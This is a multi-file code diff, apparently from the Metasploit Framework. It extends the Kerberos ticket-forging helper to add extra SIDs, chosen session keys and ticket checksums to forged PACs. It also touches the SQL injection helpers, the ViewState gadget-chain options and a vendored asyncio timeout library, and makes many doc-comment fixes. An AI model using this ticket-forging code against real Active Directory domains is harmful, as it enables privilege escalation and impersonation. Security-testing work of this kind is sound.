          # @param client_etypes [Array<Integer>] Available ciphers on the client side (etypes from Rex::Proto::Kerberos::Crypto::Encryption)
-          # @param server_etypeinfos [Array<Rex::Proto::Kerberos::Model::PreAuthEtypeInfo2Entry>] Available ciphers (including additional info such as salts) on the server
+          # @param server_etypeinfos_entries [Array<Rex::Proto::Kerberos::Model::PreAuthEtypeInfo2Entry>] Available ciphers (including additional info such as salts) on the server
          # @return [Rex::Proto::Kerberos::Model::EtypeInfo] The selected cipher
          def select_cipher(client_etypes, server_etypeinfos_entries)
            client_etypes.each do |client_etype|
@@ -35,7 +35,7 @@ module Msf
              )
            end

-            # @param [Object] encoded_ap_req The ASN1 KRB_AP_REQ as defined in https://datatracker.ietf.org/doc/html/rfc1964#section-1.1.1
+            # @param ap_request_asn1 [Object] The ASN1 KRB_AP_REQ as defined in https://datatracker.ietf.org/doc/html/rfc1964#section-1.1.1
            # @return [String] SPNEGO GSS Blob
            def encode_gss_spnego_ap_request(ap_request_asn1)
              ap_request_mech = encode_gss_kerberos_ap_request(ap_request_asn1)
@@ -33,6 +33,7 @@ module Msf
            # @option opts [Integer] :user_id the user SID Ex: 1000
            # @option opts [Integer] :group_id Ex: 513 for 'Domain Users'
            # @option opts [Array<Integer>] :group_ids
+            # @option opts [Array<String>] :extra_sids An array of extra sids, Ex: `['S-1-5-etc-etc-519']`
            # @option opts [String] :realm
            # @option opts [String] :domain_id the domain SID Ex: S-1-5-21-1755879683-3641577184-3486455962
            # @option opts [Time] :logon_time
@@ -48,10 +49,12 @@ module Msf
              user_id = opts[:user_id] || Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID
              primary_group_id = opts[:group_id] || Rex::Proto::Kerberos::Pac::DOMAIN_USERS
              group_ids = opts[:group_ids] || [Rex::Proto::Kerberos::Pac::DOMAIN_USERS]
+              extra_sids = opts[:extra_sids] || []
              domain_name = opts[:realm] || ''
              domain_id = opts[:domain_id] || Rex::Proto::Kerberos::Pac::NT_AUTHORITY_SID
              logon_time = opts[:logon_time] || Time.now
              checksum_type = opts[:checksum_type] || Rex::Proto::Kerberos::Crypto::Checksum::RSA_MD5
+              ticket_checksum = opts[:ticket_checksum] || nil

              validation_info = Rex::Proto::Kerberos::Pac::Krb5ValidationInfo.new(
                logon_time: logon_time,
@@ -68,13 +71,16 @@ module Msf
                logon_server: ''
              )
              validation_info.group_ids = group_ids
-
+              if extra_sids && extra_sids.length > 0
+                validation_info.extra_sids = extra_sids.map do |sid|
+                  { sid: sid, attributes: Rex::Proto::Kerberos::Pac::SE_GROUP_ALL }
+                end
+              end

              logon_info = Rex::Proto::Kerberos::Pac::Krb5LogonInformation.new(
                data: validation_info
              )

-
              client_info = Rex::Proto::Kerberos::Pac::Krb5ClientInfo.new(
                client_id: logon_time,
                name: user_name
@@ -94,6 +100,7 @@ module Msf
                server_checksum,
                priv_srv_checksum
              ]
+              pac_elements << ticket_checksum unless ticket_checksum.nil?

              pac_type = Rex::Proto::Kerberos::Pac::Krb5Pac.new
              pac_type.assign(pac_elements: pac_elements)
@@ -111,14 +118,23 @@ module Msf
              pac = opts[:pac] || build_pac(opts)

              pac_auth_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
-                elements: [{:type => Rex::Proto::Kerberos::Pac::AD_WIN2K_PAC, :data => pac.to_binary_s}]
+                elements: [{ type: Rex::Proto::Kerberos::Pac::AD_WIN2K_PAC, data: pac.to_binary_s}]
              )
              authorization_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
-                elements: [{:type => Rex::Proto::Kerberos::Model::AuthorizationDataType::AD_IF_RELEVANT, :data => pac_auth_data.encode}]
+                elements: [{ type: Rex::Proto::Kerberos::Model::AuthorizationDataType::AD_IF_RELEVANT, data: pac_auth_data.encode }]
              )

              authorization_data
            end
+
+            def build_empty_auth_data
+              pac_auth_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
+                elements: [{ type: Rex::Proto::Kerberos::Pac::AD_WIN2K_PAC, data: "\x00" }]
+              )
+              Rex::Proto::Kerberos::Model::AuthorizationData.new(
+                elements: [{ type: Rex::Proto::Kerberos::Model::AuthorizationDataType::AD_IF_RELEVANT, data: pac_auth_data.encode }]
+              )
+            end
          end
        end
      end
@@ -277,7 +277,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base

  end

-  # @param [String] security_buffer SPNEGO GSS Blob
+  # @param security_blob [String] SPNEGO GSS Blob
  # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if the response was not successful
  def validate_response!(security_blob)
    gss_api = OpenSSL::ASN1.decode(security_blob)
@@ -302,17 +302,22 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
  # @see #get_cached_credential Other options documentation
  # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential
  def request_tgt_only(options = {})
-    credential = get_cached_credential(
-      options.merge(
-        sname: Rex::Proto::Kerberos::Model::PrincipalName.new(
-          name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
-          name_string: [
-            "krbtgt",
-            realm
-          ]
+    if options[:cache_file]
+      credential = load_credential_from_file(options[:cache_file])
+    else
+      credential = get_cached_credential(
+        options.merge(
+          sname: Rex::Proto::Kerberos::Model::PrincipalName.new(
+            name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
+            name_string: [
+              "krbtgt",
+              realm
+            ]
+          )
        )
      )
-    )
+    end
+
    if credential
      print_status("#{peer} - Using cached credential for #{credential.server} #{credential.client}")
      return credential
@@ -459,7 +464,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
  #
  # @see https://learn.microsoft.com/en-us/archive/blogs/openspecification/how-kerberos-user-to-user-authentication-works
  #
-  # @param [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential from the TGT
+  # @param credential [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential from the TGT
  # @param [Hash] options
  def u2uself(credential, options = {})
    realm = self.realm.upcase
@@ -1010,22 +1015,22 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
      end

      unless !@realm || @realm.casecmp?(credential.server.realm.to_s)
-        wlog("Filtered credential #{file_path} ##{index} reason: Realm does not match (realm: #{credential.server.realm})")
+        wlog("Filtered credential #{file_path} ##{index} reason: Realm (#{@realm}) does not match (realm: #{credential.server.realm})")
        next
      end

      unless !sname || sname.to_s.casecmp?(credential.server.components.snapshot.join('/'))
-        wlog("Filtered credential #{file_path} ##{index} reason: SPN does not match (spn: #{credential.server.components.snapshot.join('/')})")
+        wlog("Filtered credential #{file_path} ##{index} reason: SPN (#{sname}) does not match (spn: #{credential.server.components.snapshot.join('/')})")
        next
      end

      unless !sname_hostname || sname_hostname.to_s.casecmp?(credential.server.components[1])
-        wlog("Filtered credential #{file_path} ##{index} reason: SPN hostname does not match (spn: #{credential.server.components.snapshot.join('/')})")
+        wlog("Filtered credential #{file_path} ##{index} reason: SPN (#{sname_hostname}) hostname does not match (spn: #{credential.server.components.snapshot.join('/')})")
        next
      end

      unless !@username || @username.casecmp?(credential.client.components.last.to_s)
-        wlog("Filtered credential #{file_path} ##{index} reason: Username does not match (username: #{credential.client.components.last})")
+        wlog("Filtered credential #{file_path} ##{index} reason: Username (#{@username}) does not match (username: #{credential.client.components.last})")
        next
      end

@@ -1,15 +1,18 @@
 # -*- coding: binary -*-

 require 'date'
+require 'rex/proto/kerberos/pac/krb5_pac'

 module Msf
  class Exploit
    class Remote
      module Kerberos
        module Ticket
+          # @param [String] session_key The session key
+          # @param [Array<String>] extra_sids An array of extra sids, Ex: `['S-1-5-etc-etc-519']`
          def forge_ticket(enc_key:, enc_type:, start_time:, end_time:, sname:, flags:,
                           domain:, username:, user_id: Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID,
-                           domain_sid:, save_ccache: true)
+                           domain_sid:, extra_sids: [], session_key: nil, ticket_checksum: false)
            sname_principal = create_principal(sname)
            cname_principal = create_principal(username)
            group_ids = [
@@ -19,7 +22,6 @@ module Msf
              Rex::Proto::Kerberos::Pac::SCHEMA_ADMINISTRATORS,
              Rex::Proto::Kerberos::Pac::ENTERPRISE_ADMINS,
            ]
-            key_length = enc_type == Rex::Proto::Kerberos::Crypto::Encryption::AES256 ? 16 : 8
            # https://www.ietf.org/rfc/rfc3962.txt#:~:text=7.%20%20Assigned%20Numbers
            case enc_type
            when Rex::Proto::Kerberos::Crypto::Encryption::AES256
@@ -29,6 +31,13 @@ module Msf
            else
              checksum_type = Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5
            end
+
+            session_key_byte_length = enc_type == Rex::Proto::Kerberos::Crypto::Encryption::AES256 ? 32 : 16
+            session_key ||= SecureRandom.hex(session_key_byte_length / 2)
+            if session_key.bytes.length != session_key_byte_length
+              raise "Invalid key length for session key, expected #{session_key_byte_length}, got #{session_key.length} for session key #{session_key}"
+            end
+
            opts = {
              client: cname_principal,
              server: sname_principal,
@@ -39,14 +48,16 @@ module Msf
              realm: domain.upcase,
              key_value: enc_key,
              checksum_enc_key: enc_key,
-              secure_random_key: SecureRandom.hex(key_length),
+              session_key: session_key,
              enc_type: enc_type,
              user_id: user_id,
              group_ids: group_ids,
              checksum_type: checksum_type,
              client_name: username,
              domain_id: domain_sid,
-              flags: flags
+              extra_sids: extra_sids,
+              flags: flags,
+              create_ticket_checksum: ticket_checksum
            }

            ticket_enc_part = create_enc_ticket_part(opts: opts)
@@ -62,10 +73,6 @@ module Msf
            # Wrap the ticket up with its metadata, i.e. its key/sname/time information etc
            ccache = ticket_as_krb5ccache(ticket, opts: opts)

-            if save_ccache
-              Kerberos::Ticket::Storage.store_ccache(ccache, framework_module: self)
-            end
-
            ccache
          end

@@ -73,7 +80,7 @@ module Msf
            ticket_enc_part = Rex::Proto::Kerberos::Model::TicketEncPart.new

            ticket_enc_part.key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
-              type: opts[:enc_type], value: opts[:secure_random_key]
+              type: opts[:enc_type], value: opts[:session_key]
            )
            ticket_enc_part.flags = opts[:flags]
            ticket_enc_part.crealm = opts[:realm]
@@ -83,6 +90,11 @@ module Msf
            ticket_enc_part.starttime = opts[:start_time]
            ticket_enc_part.endtime = opts[:end_time]
            ticket_enc_part.renew_till = opts[:renew_till]
+            if opts[:create_ticket_checksum]
+              opts[:ticket_checksum] = create_ticket_checksum(opts[:checksum_type],
+                                                              opts[:checksum_enc_key],
+                                                              ticket_enc_part)
+            end
            ticket_enc_part.authorization_data = build_pac_authorization_data(opts)
            ticket_enc_part
          end
@@ -124,7 +136,7 @@ module Msf
                  server: create_ccache_principal(opts[:server], opts[:realm]),
                  keyblock: {
                    enctype: opts[:enc_type],
-                    data: opts[:secure_random_key]
+                    data: opts[:session_key]
                  },
                  authtime: opts[:auth_time],
                  starttime: opts[:start_time],
@@ -178,6 +190,25 @@ module Msf
            presenter = Rex::Proto::Kerberos::CredentialCache::Krb5CcachePresenter.new(ccache)
            print_status presenter.present(key: key)
          end
+
+          private
+
+          def create_ticket_checksum(checksum_type, checksum_enc_key, ticket_enc_part)
+            ticket_enc_part = ticket_enc_part.dup
+            ticket_enc_part.authorization_data = build_empty_auth_data
+            ticket_checksum = Rex::Proto::Kerberos::Pac::Krb5TicketChecksum.new(signature_type: checksum_type)
+            ticket_checksum.signature = calculate_checksum(
+              ticket_checksum.signature_type,
+              checksum_enc_key,
+              ticket_enc_part.encode
+            )
+            ticket_checksum
+          end
+
+          def calculate_checksum(signature_type, key, data)
+            checksummer = Rex::Proto::Kerberos::Crypto::Checksum.from_checksum_type(signature_type)
+            checksummer.checksum(key, Rex::Proto::Kerberos::Crypto::KeyUsage::KERB_NON_KERB_CKSUM_SALT, data)
+          end
        end
      end
    end
@@ -125,7 +125,7 @@ module Msf::Exploit::SQLi::MySQLi
    #  @param table [String]  The name of the table to query
    #  @param columns [Array] The names of the columns to query
    #  @param condition [String] An optional condition, return only the rows satisfying it
-    #  @param limit [Integer] An optional maximum number of results to return
+    #  @param num_limit [Integer] An optional maximum number of results to return
    #  @return [Array] An array, where each element is an array of strings representing a row of the results
    #
    def dump_table_fields(table, columns, condition = '', num_limit = 0)
@@ -117,7 +117,7 @@ module Msf::Exploit::SQLi::PostgreSQLi
    #  @param table [String]  The name of the table to query
    #  @param columns [Array] The names of the columns to query
    #  @param condition [String] An optional condition, return only the rows satisfying it
-    #  @param limit [Integer] An optional maximum number of results to return
+    #  @param num_limit [Integer] An optional maximum number of results to return
    #  @return [Array] An array, where each element is an array of strings representing a row of the results
    #
    def dump_table_fields(table, columns, condition = '', num_limit = 0)
@@ -217,7 +217,7 @@ module Msf::Exploit::SQLi::SQLitei
    #  @param query [String] the SQL query to execute
    #  @param length [Integer] the expected length of the result
    #  @param known_bits [Integer] (returned by get_bitmask) bits that are common to all the output characters
-    #  @param bits_to_guess [Integer] (returned by get_bitmask) The number of bits to guess on each character of the output
+    #  @param _bits_to_guess [Integer] (returned by get_bitmask) The number of bits to guess on each character of the output
    #  @param timebased [Boolean] Whether or not it's a time-based blind injection
    #  @return [String] The result of the given query
    #
@@ -34,7 +34,7 @@ module Exploit::ViewState
          true,
          '.NET gadget chain to use in ViewState',
          :TextFormattingRunProperties,
-          Msf::Util::DotNetDeserialization::GadgetChains::NAMES
+          Msf::Util::DotNetDeserialization.formatter_compatible_gadget_chains(:LosFormatter)
        ]
      )
    ])
@@ -184,7 +184,7 @@ module Msf
      end
    end

-    # @param[Constant] One or more Ruby constants
+    # @param rb_modules [Constant] One or more Ruby constants
    # @return [void]
    def register_extensions(*rb_modules)
      datastore[REPLICANT_EXTENSION_DS_KEY] = [] unless datastore[REPLICANT_EXTENSION_DS_KEY].present?
@@ -52,8 +52,8 @@ module Msf::Module::Alert
      get_alerts(:error)
    end

-    # @param [Symbol] the alert level to return
-    # @return [Array<String, Proc>] a list of `level` alerts, either in string
+    # @param level [Symbol] The alert level to return
+    # @return [Array<String, Proc>] A list of `level` alerts, either in string
    #   or block form. Blocks expect to be executed in the context of a fully
    #   initialized module instance and will return `nil` if the alert they are
    #   looking for does not apply or a string or array of strings, each
@@ -163,7 +163,7 @@ module Msf::Module::Alert
  # Similar to {ClassMethods#get_alerts}, but executes each registered block in
  # the context of this module instance and returns a flattened list of strings.
  # (see {ClassMethods#get_alerts})
-  # @param [Symbol] the alert level to return
+  # @param level [Symbol] The alert level to return
  # @return [Array<String>]
  def get_alerts(level)
    self.alerts ||= {}
@@ -5,11 +5,6 @@ module Msf::Module::External

  def execute_module(path, method: :run, args: datastore, fail_on_exit: true)
    mod = Msf::Modules::External.new(path, framework: framework)
-    if args.is_a?(Msf::DataStore) || args.is_a?(Msf::DataStoreWithFallbacks)
-      datastore_to_h = args.to_h
-      datastore_to_h['rhost'] = args['RHOSTS'] if args['RHOSTS'] && datastore_to_h['rhost'].to_s.empty?
-      args = datastore_to_h
-    end
    success = mod.exec(method: method, args: args) do |m|
      begin
        case m.method
@@ -150,7 +150,15 @@ module Msf::Module::ModuleInfo
  # Merges the module description.
  #
  def merge_info_description(info, val)
-    merge_info_string(info, 'Description', val, ". ", true)
+    key = 'Description'
+    unless info[key]
+      info[key] = val
+      return
+    end
+
+    current_value = Msf::Serializer::ReadableText.word_wrap_description(info[key])
+    new_value = Msf::Serializer::ReadableText.word_wrap_description(val)
+    info[key] = current_value.end_with?('.') ? "#{current_value}\n#{val}" : "#{current_value}.\n\n#{new_value}"
  end

  #
@@ -1,101 +1,212 @@
 # Vendored from https://github.com/aio-libs/async-timeout
-# Copyright: 2016-2017 Andrew Svetlov
+# Copyright: 2016-2023 Andrew Svetlov
 # License: Apache 2.0

 import asyncio
+import enum
+import sys
+import warnings
+from types import TracebackType
+from typing import Optional, Type


-__version__ = '2.0.0'
+if sys.version_info >= (3, 8):
+    from typing import final
+else:
+    from typing_extensions import final


-class timeout:
+__version__ = "4.0.2"
+
+
+__all__ = ("timeout", "timeout_at", "Timeout")
+
+
+def timeout(delay: Optional[float]) -> "Timeout":
    """timeout context manager.
-
    Useful in cases when you want to apply timeout logic around block
    of code or in cases when asyncio.wait_for is not suitable. For example:
-
    >>> async with timeout(0.001):
    ...     async with aiohttp.get('https://github.com') as r:
    ...         await r.text()
-
-
-    timeout - value in seconds or None to disable timeout logic
-    loop - asyncio compatible event loop
+    delay - value in seconds or None to disable timeout logic
    """
-    def __init__(self, timeout, *, loop=None):
-        self._timeout = timeout
-        if loop is None:
-            loop = asyncio.get_event_loop()
+    loop = asyncio.get_running_loop()
+    if delay is not None:
+        deadline = loop.time() + delay  # type: Optional[float]
+    else:
+        deadline = None
+    return Timeout(deadline, loop)
+
+
+def timeout_at(deadline: Optional[float]) -> "Timeout":
+    """Schedule the timeout at absolute time.
+    deadline argument points on the time in the same clock system
+    as loop.time().
+    Please note: it is not POSIX time but a time with
+    undefined starting base, e.g. the time of the system power on.
+    >>> async with timeout_at(loop.time() + 10):
+    ...     async with aiohttp.get('https://github.com') as r:
+    ...         await r.text()
+    """
+    loop = asyncio.get_running_loop()
+    return Timeout(deadline, loop)
+
+
+class _State(enum.Enum):
+    INIT = "INIT"
+    ENTER = "ENTER"
+    TIMEOUT = "TIMEOUT"
+    EXIT = "EXIT"
+
+
+@final
+class Timeout:
+    # Internal class, please don't instantiate it directly
+    # Use timeout() and timeout_at() public factories instead.
+    #
+    # Implementation note: `async with timeout()` is preferred
+    # over `with timeout()`.
+    # While technically the Timeout class implementation
+    # doesn't need to be async at all,
+    # the `async with` statement explicitly points that
+    # the context manager should be used from async function context.
+    #
+    # This design allows to avoid many silly misusages.
+    #
+    # TimeoutError is raised immediately when scheduled
+    # if the deadline is passed.
+    # The purpose is to time out as soon as possible
+    # without waiting for the next await expression.
+
+    __slots__ = ("_deadline", "_loop", "_state", "_timeout_handler")
+
+    def __init__(
+        self, deadline: Optional[float], loop: asyncio.AbstractEventLoop
+    ) -> None:
        self._loop = loop
-        self._task = None
-        self._cancelled = False
-        self._cancel_handler = None
-        self._cancel_at = None
+        self._state = _State.INIT

-    def __enter__(self):
-        return self._do_enter()
-
-    def __exit__(self, exc_type, exc_val, exc_tb):
-        self._do_exit(exc_type)
-
-    @asyncio.coroutine
-    def __aenter__(self):
-        return self._do_enter()
-
-    @asyncio.coroutine
-    def __aexit__(self, exc_type, exc_val, exc_tb):
-        self._do_exit(exc_type)
-
-    @property
-    def expired(self):
-        return self._cancelled
-
-    @property
-    def remaining(self):
-        if self._cancel_at is not None:
-            return max(self._cancel_at - self._loop.time(), 0.0)
+        self._timeout_handler = None  # type: Optional[asyncio.Handle]
+        if deadline is None:
+            self._deadline = None  # type: Optional[float]
        else:
-            return None
+            self.update(deadline)

-    def _do_enter(self):
-        # Support Tornado 5- without timeout
-        # Details: https://github.com/python/asyncio/issues/392
-        if self._timeout is None:
-            return self
-
-        self._task = current_task(self._loop)
-        if self._task is None:
-            raise RuntimeError('Timeout context manager should be used '
-                               'inside a task')
-
-        if self._timeout <= 0:
-            self._loop.call_soon(self._cancel_task)
-            return self
-
-        self._cancel_at = self._loop.time() + self._timeout
-        self._cancel_handler = self._loop.call_at(
-            self._cancel_at, self._cancel_task)
+    def __enter__(self) -> "Timeout":
+        warnings.warn(
+            "with timeout() is deprecated, use async with timeout() instead",
+            DeprecationWarning,
+            stacklevel=2,
+        )
+        self._do_enter()
        return self

-    def _do_exit(self, exc_type):
-        if exc_type is asyncio.CancelledError and self._cancelled:
-            self._cancel_handler = None
-            self._task = None
+    def __exit__(
+        self,
+        exc_type: Optional[Type[BaseException]],
+        exc_val: Optional[BaseException],
+        exc_tb: Optional[TracebackType],
+    ) -> Optional[bool]:
+        self._do_exit(exc_type)
+        return None
+
+    async def __aenter__(self) -> "Timeout":
+        self._do_enter()
+        return self
+
+    async def __aexit__(
+        self,
+        exc_type: Optional[Type[BaseException]],
+        exc_val: Optional[BaseException],
+        exc_tb: Optional[TracebackType],
+    ) -> Optional[bool]:
+        self._do_exit(exc_type)
+        return None
+
+    @property
+    def expired(self) -> bool:
+        """Is timeout expired during execution?"""
+        return self._state == _State.TIMEOUT
+
+    @property
+    def deadline(self) -> Optional[float]:
+        return self._deadline
+
+    def reject(self) -> None:
+        """Reject scheduled timeout if any."""
+        # cancel is maybe better name but
+        # task.cancel() raises CancelledError in asyncio world.
+        if self._state not in (_State.INIT, _State.ENTER):
+            raise RuntimeError(f"invalid state {self._state.value}")
+        self._reject()
+
+    def _reject(self) -> None:
+        if self._timeout_handler is not None:
+            self._timeout_handler.cancel()
+            self._timeout_handler = None
+
+    def shift(self, delay: float) -> None:
+        """Advance timeout on delay seconds.
+        The delay can be negative.
+        Raise RuntimeError if shift is called when deadline is not scheduled
+        """
+        deadline = self._deadline
+        if deadline is None:
+            raise RuntimeError("cannot shift timeout if deadline is not scheduled")
+        self.update(deadline + delay)
+
+    def update(self, deadline: float) -> None:
+        """Set deadline to absolute value.
+        deadline argument points on the time in the same clock system
+        as loop.time().
+        If new deadline is in the past the timeout is raised immediately.
+        Please note: it is not POSIX time but a time with
+        undefined starting base, e.g. the time of the system power on.
+        """
+        if self._state == _State.EXIT:
+            raise RuntimeError("cannot reschedule after exit from context manager")
+        if self._state == _State.TIMEOUT:
+            raise RuntimeError("cannot reschedule expired timeout")
+        if self._timeout_handler is not None:
+            self._timeout_handler.cancel()
+        self._deadline = deadline
+        if self._state != _State.INIT:
+            self._reschedule()
+
+    def _reschedule(self) -> None:
+        assert self._state == _State.ENTER
+        deadline = self._deadline
+        if deadline is None:
+            return
+
+        now = self._loop.time()
+        if self._timeout_handler is not None:
+            self._timeout_handler.cancel()
+
+        task = asyncio.current_task()
+        if deadline <= now:
+            self._timeout_handler = self._loop.call_soon(self._on_timeout, task)
+        else:
+            self._timeout_handler = self._loop.call_at(deadline, self._on_timeout, task)
+
+    def _do_enter(self) -> None:
+        if self._state != _State.INIT:
+            raise RuntimeError(f"invalid state {self._state.value}")
+        self._state = _State.ENTER
+        self._reschedule()
+
+    def _do_exit(self, exc_type: Optional[Type[BaseException]]) -> None:
+        if exc_type is asyncio.CancelledError and self._state == _State.TIMEOUT:
+            self._timeout_handler = None
            raise asyncio.TimeoutError
-        if self._timeout is not None and self._cancel_handler is not None:
-            self._cancel_handler.cancel()
-            self._cancel_handler = None
-        self._task = None
+        # timeout has not expired
+        self._state = _State.EXIT
+        self._reject()
+        return None

-    def _cancel_task(self):
-        self._task.cancel()
-        self._cancelled = True
-
-
-def current_task(loop):
-    task = asyncio.Task.current_task(loop=loop)
-    if task is None:
-        if hasattr(loop, 'current_task'):
-            task = loop.current_task()
-
-    return task
+    def _on_timeout(self, task: "asyncio.Task[None]") -> None:
+        task.cancel()
+        self._state = _State.TIMEOUT
+        # drop the reference early
+        self._timeout_handler = None
--- a/Show More
+++ b/Show More